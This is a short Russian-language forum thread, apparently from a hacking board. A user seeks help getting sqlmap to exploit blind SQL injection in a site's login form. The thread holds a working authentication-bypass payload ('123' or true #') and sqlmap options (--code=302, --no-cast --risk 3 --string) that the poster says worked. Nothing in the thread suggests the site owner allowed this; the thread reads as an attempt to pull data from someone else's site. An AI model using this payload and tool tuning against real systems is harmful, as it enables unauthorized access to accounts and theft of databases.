Старый 04.06.2018, 20:23   #1
branderbier
 
Регистрация: 04.06.2018
Сообщений: 3
Репутация: 0
Question [sqlmap] Boolean редирект

Привет.
Есть один сайт со слепой скулей в логине. Ее конечно можно и руками разобрать, но там нестандартные названия таблиц и полей, так что хотелось бы автоматизировать это все.

Проблема вот в чем:
При логине посылаются "login=user&pass=password" (не верные данные) - 302 редирект на login.php?error=1
При "login=user&pass=123' or true #" - 302 редирект на login.php?usr=1234 (номер пользователя)

Пробовал через --not-string "Location: vulnsite.tld/login.php?error=1" - не видит инъекции. При этом в логе видно правильное срабатывание и редирект на login.php?usr=1234. Пробовал и просто --string и с --ignore-redirects и разные level и risk.

Как быть?
branderbier вне форума   Ответить с цитированием
Старый 08.06.2018, 06:11   #2
k1u4nick
 
Регистрация: 02.08.2014
Сообщений: 2
Репутация: 0
По умолчанию

--code=302 --titles=%что написанно в титле%
k1u4nick вне форума   Ответить с цитированием
Старый 08.06.2018, 19:53   #3
branderbier
 
Регистрация: 04.06.2018
Сообщений: 3
Репутация: 0
По умолчанию

Цитата:
Сообщение от k1u4nick Посмотреть сообщение
--code=302 --titles=%что написанно в титле%
Заголовок не меняется.
В данном случае я все-таки обошел эту тему через:
--no-cast --risk 3 --string "vulnsite.tld/login.php?usr=1234"
sqlmap got a 302 redirect to 'vulnsite.tld/login.php?error=1'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] n

Где-то в теле ответа в хтмл есть ссылка vulnsite.tld/login.php?usr=1234

Но на будущее вопрос остается открытым.
branderbier вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd. Перевод: zCarot